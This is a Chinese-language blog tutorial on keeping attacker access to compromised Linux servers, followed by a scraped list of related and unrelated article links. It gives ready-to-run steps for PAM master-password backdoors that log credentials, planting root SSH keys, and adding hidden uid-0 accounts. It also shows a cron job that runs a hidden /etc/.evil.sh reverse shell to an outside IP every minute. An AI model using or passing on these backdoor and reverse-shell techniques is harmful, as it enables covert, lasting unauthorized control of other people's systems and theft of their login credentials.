目录

前言

rookit后门

PAM后门

ssh公私钥免密登录

添加linux账户

计划任务

openssh后门万能密码


前言

上面我们讲了windows权限维持的方法 —> Windows权限维持方法 ,以及当我们拿到一台linux机器时,如何隐藏我们的踪迹 —> Linux权限维持—隐藏踪迹,这里我们讲述下如何植入后门来维持我们获取的权限。

rookit后门

介绍

Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。

rootkit是linux平台下最常见的一种木马后门工具,它主要是通过替换系统文件来达到入侵和隐藏的目的。rootkit主要分为文件级别的和内核级别的

  • 文件级别:一般是通过程序漏洞或者系统漏洞进入系统后,通过修改系统的重要文件来达到隐藏自己的目的。在系统遭受rootkit攻击后,合法的文件被木马程序替代,变成了外壳程序,而其内部是隐藏着的后门程序。
  • 内核级别:是比文件级rootkit更高级的一种入侵方式,它可以使攻击者获得对系统底层的完全控制权,此时攻击者可以修改系统内核,进而截获运行程序向内核提交的命令,并将其重定向到入侵者所选择的程序并运行此程序。

常用的rookit后门工具有Reptile、mafix

Reptile

Reptile是一款rookit后门工具。项目地址:GitHub - Reptile。使用方法可参考:Reptile 一款LKM Linux rootkit后门使用教程 - 3HACK

工具虽然很强大,但是该工具在新的linux下系统不能使用,由于内核问题。本人还觉得其设置过于复杂,连接需要填入的参数过多,并不方便使用。

PAM后门

PAM是一种认证模块,PAM可以作为Linux登录验证和各类基础服务的认证,简单来说就是一种用于Linux系统上的用户身份验证的机制。进行认证时首先确定是什么服务,然后加载相应的PAM的配置文件(位于/etc/pam.d),最后调用认证文件(位于/lib/security)进行安全认证

简易利用的PAM后门也是通过修改PAM源码中认证的逻辑来达到权限维持

利用方法:

1、获取目标系统所使用的PAM版本,下载对应版本的pam版本
2、解压缩,修改pam_unix_auth.c文件,添加万能密码
3、编译安装PAM
4、编译完后的文件在:modules/pam_unix/.libs/pam_unix.so,复制到/lib64/security中进行替换,即可使用万能密码登陆,并将用户名密码记录到文件中。

参考:https://xz.aliyun.com/t/7902

ssh公私钥免密登录

创建秘钥对,然后将公钥上传到拿下的服务器中,实现root账号免密登录

1. 生成ssh秘钥对

ssh-keygen -t rsa

保存路径输入 ./id_rsa ,保存到当前路径。接着再按两次回车

2.  将id_rsa.pub公钥上传到服务中

3. 将公钥写入到authorized_keys文件中

mkdir /root/.ssh && touch /root/.ssh/authorized_keys
cat id_rsa.pub >> /root/.ssh/authorized_keys && chmod 600 /root/.ssh/authorized_keys && chmod 700 /root/.ssh/

4. 配置允许使用秘钥登录

vim /etc/ssh/sshd_config
RSAAuthentication yes
PubkeyAuthentication yes

5. ssh秘钥登录

ssh -i id_rsa root@192.168.110.131

成功实现秘钥登录

添加linux账户

目标:添加一个uid为0的账号,linux中超级管理员root的uid为0,这里我们再添加一个uid为0的账号

使用useradd添加

#添加账号test1,设置uid为0,密码为123456
useradd -p `openssl passwd -1 -salt 'salt' 123456` test1 -o -u 0 -g root -G root -s /bin/bash -d /home/test1

执行后则

#/etc/passwd
test1:x:0:0::/home/test1:/bin/bash
#/etc/shadow
test1:$1$salt$638tR8bROOvPnPklDQ9Vf/:19129:0:99999:7:::

远程连接,权限为root

直接写入/etc/passwd

1. 首先,使用perl语言(Linux自带)生成带有盐值的密码:

perl -le 'print crypt("123456","addedsalt")'

2. 添加test2账号,密码设置为123456

echo "test2:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >>/etc/passwd

计划任务

使用crontab命令进行反弹shell。crontab命令用于设置周期性被执行的指令。新建shell脚本,利用脚本进行反弹。

1. 创建反弹shell脚本,vim /etc/.evil.sh

#!/bin/bash
bash -i >& /dev/tcp/39.100.xx.xx/80  0>&1

并加上执行权限

chmod +x /etc/.evil.sh

2. 添加计划任务

我们可以使用crontab -e或者vim /etc/crontab添加计划任务

#添加计划任务
vim /etc/crontab
#查看计划任务
cat /etc/crontab

设置定时任务为每分钟执行一次

#每一分钟执行一次
*/1 * * * * root /etc/.evil.sh

3. 重启cron

service cron restart

然后就可以接收反弹shell

openssh后门万能密码

通过修改SSH源代码的方式来留一个万能的SSH密码。参考:SSH后门万能密码 - 墨鱼菜鸡 - 博客园

方法还有很多~~

相关文章:第4篇:Linux权限维持--后门篇 · 应急响应实战笔记

Linux权限维持—后门篇相关推荐

  1. Linux权限维持之suid后门、ssh后门

    文中主要讲解Linux权限维持中的小技巧,通过了解掌握SUID后门.SSH后门等方式,更快知晓权限维持作用.本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿 ...

  2. linux nas解决方案_畅快玩转NAS 篇一:Linux权限简单讲解

    畅快玩转NAS 篇一:Linux权限简单讲解 2020-01-22 19:02:28 35点赞 189收藏 8评论 你是AMD Yes党?还是intel和NVIDIA的忠实簇拥呢?最新一届#装机大师赛 ...

  3. Linux常用命令(本篇包括,Linux目录结构介绍、Linux Shell介绍、9个常见命令介绍、文件的概念、文件的操作(20个)、目录的操作、文件和目录的权限、文件压缩及解压缩)

    Linux常用命令(本篇包括,Linux目录结构介绍.Linux Shell介绍.9个常见命令介绍.文件的概念.文件的操作(20个).目录的操作.文件和目录的权限.文件压缩及解压缩)         ...

  4. 鸟哥的Linux私房菜(基础篇)- 第十四章、Linux 账号管理与 ACL 权限配置

    第十四章.Linux账号管理与 ACL 权限配置 最近升级日期:2009/09/09 要登陆 Linux 系统一定要有账号与口令才行,否则怎么登陆,您说是吧?不过,不同的使用者应该要拥有不同的权限才行 ...

  5. 看完这篇 Linux 权限后,通透了

    我们在使用 Linux 的过程中,或多或少都会遇到一些关于使用者和群组的问题,比如最常见的你想要在某个路径下执行某个指令,会经常出现这个错误提示 . permission denied 反正我大概率见 ...

  6. Linux权限不理解?看完这篇就够用了

    Linux关于用户 Linux的用户分类 Linux用户的切换 su的使用 扩展 sudo的使用 Linux权限的概念 文件的的权限 文件的后缀名 文件权限 更改文件权限 chmod chown ch ...

  7. 鸟哥的Linux私房菜(基础篇)- 第十七章、程序管理与 SELinux 初探

    第十七章.程序管理与 SELinux初探 最近升级日期:2009/09/11 一个程序被加载到内存当中运行,那么在内存内的那个数据就被称为程序(process).程序是操作系统上非常重要的概念,所有系 ...

  8. 后门怎么写隐蔽java_用Java写黑软-后门篇

    这次我给大家带来的是<用Java写黑软-后门篇>,目前我在网上还没有找到哪位高手把自己写的java后门公布出来,有的也多是些恶搞的东西,所以这次我就来献献丑了. 先来一段理论的东西,后门, ...

  9. python通用权限管理框架图_通用权限管理设计篇_设计模式

    摘要: 本文讲的是通用权限管理设计篇_设计模式, 博客地址:http://www.blogjava.net/amigoxie/  一.引言        因为做过的一些系统的权限管理的功能虽然在逐步完 ...

最新文章

  1. 推荐​一款Java音频视频编码器,很赞~
  2. 精通移动端布局 - 概念篇 -
  3. 第05课:神经网络基础知识
  4. Uva10795 A Different Task
  5. React之setState使用
  6. c语言链表贪吃蛇脚本之家,C++控制台实现贪吃蛇游戏
  7. Spring AMQP RabbitMQ示例
  8. node 常用的一些终端的命令的快捷键
  9. pager-taglib 使用说明
  10. 盘点各种程序员常用的框架,看看你是否落伍了?
  11. detectron2注册数据集
  12. CentOS 6.3_Nagios安装笔记
  13. CSDN资源免费下载攻略,手慢无!
  14. 基于51单片机的热敏电阻测温设计
  15. iOS设置启动页并适配机型
  16. 写任务,列清单-4D工作法
  17. 符号_王者荣耀2019名字特殊符号大全 最好看的特殊符号复制
  18. ubuntu之截图工具Flameshot
  19. 手机版专题页面的注意事项
  20. 亚马逊kindle被约谈,当当、京东齐拍手

热门文章

  1. 互联网电视集成业务牌照
  2. EasyDemo*xxx企业xxx项目xxx功能测试用例模板
  3. android broadcast 大全,android 动作、广播、类别等标识大全(Android actions, broadcasts, categories, etc.).doc...
  4. 虚拟机蓝屏:KMODE EXCEPTION NOT HANDLED
  5. 手机百度网页背景颜色设置_手机百度底色怎么变为黑色?
  6. CSS3+HTML5+JavaScript:个人相册网站实现
  7. 使用 Arya 在线 Markdown 编辑器
  8. 集成学习(XGBoost,LightGBM,CatBoost)
  9. 德国跨国汽车巨头大陆集团遭LockBit勒索软件组织攻击
  10. 超详细的AD8031ARZ介绍,就在这里